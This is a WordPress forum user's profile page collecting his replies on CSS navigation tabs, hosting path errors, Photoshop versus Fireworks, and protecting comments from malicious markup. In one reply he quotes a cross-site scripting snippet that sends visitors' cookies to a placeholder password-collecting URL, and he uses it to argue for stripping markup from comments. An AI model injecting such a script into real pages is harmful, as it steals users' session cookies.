deko
Forum Replies Created
-
Forum: Your WordPress
In reply to: New Music Blog NetworkI like the way you put the number of comments next to the entry title.
I also like the way the tab highlights (not just the text) when you hover over Home, About, etc.
I still have not figured out how you did this –
<div id="nav"><a href="http://www.soundchronicle.com">HOME</a><a href="http://www.soundchronicle.com/about">ABOUT</a>okay, fine…
And for CSS:
#nav a:hover {
background-color: #f7f7f7;
color: #6B81A3;
padding: 5px;
margin-right: 10px;
}How does this light up the entire tab?
As for your color scheme, you might try a shade of red rather than the green, but that’s just preference.
Forum: Installing WordPress
In reply to: 1 and 1 hosting database errorYeah, that was more of a visceral reaction to the name 1and1…
My guess, FatherAzerun, is that it’s a matter of getting the path correct. On my host I have a pathing scheme like this:
/home/username/public_html/mydirectory/myscript.phpGoodness knows what 1and1 uses for a pathing scheme.
Forum: Installing WordPress
In reply to: 1 and 1 hosting database error1 and 1?? Sorry to hear of your misfortune. I too got ripped off – the only advice I can offer is get out… if you can…
whaddya know, I found a copy of Photoshop 6 on my hard drive 🙂
First impressions: bloatware (even wants a separate hard drive for a “scratch disk”); packed with features (there’s a cottage industry of training providers to show you how to use them); geared toward desktop publishing; includes a companion program, “ImageReady”, that apparently does what the Fireworks Optimize panel does.
Photoshop is likely the program of choice for guys with berets, ponytails and high-end Macs who create print advertising. Fireworks, on the other hand, is streamlined for creating and editing images for the web.
I think I’ll withdraw my prediction of the merger of these two programs. They are clearly for two different audiences.
Fireworks = $299 (149 upgrade)
Photoshop = $649 (169 upgrade)@whooami – what can I do with Photoshop that I can’t do with Fireworks? (just curious)
Since Adobe now owns Macromedia, they’re probably going to merge the two – “Photoworks” or something. (this is why I have not upgraded from Fireworks 7)
I doubt they’ll mess with Dreamweaver – it’s way too popular.
@lhk – yes, that slicer tool is great. it foils image snatchers and gives the perception of faster download time. if the user sees a section of a sliced image start downloading after 1 second, that’s the perceived load speed, even if it takes a complete 10 seconds to download the entire image.
I’ve never used Photoshop… been using Fireworks and Dreamweaver for years – the best web development tools out there, IMHO. I think Fireworks might be a little cheaper than Photoshop.
If ya wanna play, ya gotta pay.
Forum: Fixing WordPress
In reply to: Text allignTo split a line of text so the first few words are aligned left and the last few words are aligned right – what I’ve done in the past is use a table.
Forum: Fixing WordPress
In reply to: How to make comments safe?I did some testing with the kses file, and yes, it appears that
unfiltered_htmlis allowed only for Admins and Editors.I commented the
<em>tag (from@allowedtags) and then tried makring up a comment with it to see if had any effect – it didn’t, unless I was logged in as Admin (indicating that html was filtered by kses otherwise).So kses is protecting us.
kses doesn’t catch unclosed tags in comments, but this is not a security problem.
Forum: Fixing WordPress
In reply to: How to make comments safe?I don’t know enough about XSS to test for a vulnerability, but I’m going to use HTML_Safe anyway, if only to squash the ‘unclosed tag in comments’ bug.
I looked for codex documentation explaining why WP blogs are safe from XSS and other malicious code submitted in comments. I found this:
unfiltered_html
Allows – if enabled – the user to post HTML markup or even Javascript code in posts, pages or comments.
Note: Enabling this option for non-privileged users may result in their posting malicious code to your blog.
http://codex.wordpress.org/Roles_and_Capabilities#Editor
I don’t know if
unfiltered_htmlis disabled by default, but unless there’s some documentation assuring us that we’re safe, it’s best to assume we’re not.Forum: Fixing WordPress
In reply to: How to make comments safe?This is a better site to download HTML_Safe:
http://pixel-apes.com/safehtml
I’ve tested and verified that a bug exists in 2.0.2, namely, that an unclosed markup tag, submitted in a comment, will affect the appearance of text outside of that comment, thus altering the display of your blog.
But the more important question remains:
Are WP blogs at risk of cross-site scripting (XSS) when users submit malicious code in the Comments form?
Forum: Fixing WordPress
In reply to: How to make comments safe?This looks promising:
http://pear.php.net/package/HTML_Safe
But the first line of the script is this:
// requires HTMLSax3 package
require_once 'XML/HTMLSax3.php';Does anyone know how to verify if my host’s server has the HTMLSax3 package installed?
Can this be verified using phpinfo.php?
Forum: Fixing WordPress
In reply to: How to make comments safe?<script>
var url = 'http://www.mysite.com/send_me_passwords.cgi';
url = url + '?cookie=' + escape(document.cookie)
document.write('<script src="'+url+'">');
</script>from: http://iamcal.com/publish/articles/php/processing_html/
I think it would be best to disallow all markup in comments to avoid any risk.
This plugin:
http://www.chweng.idv.tw/blog/wordpress/comment-without-tags/
Is supposed to:
“Strip all HTML tags in comments to prevent malicious or malformed tags from destroying your pages”
I have not tested it. I downloaded it and it’s only one script that appears to reference a non-existant function.
What we need is built-in comment scrubbing.
Forum: Installing WordPress
In reply to: Ideal Hosting Envronment For WordPressThe classic LAMP configuration is hard to beat. If you’re doing stuff like a web portal, web services, transaction processing, then I’d look at ASP.NET. For a WP blog, LAMP is a better fit and probably cheaper to host.
Forum: Themes and Templates
In reply to: Does this design display correctly?One thing you might also consider is the page size. At 1253kb you are effectively barring all but the most patient of users that have dial-up connections.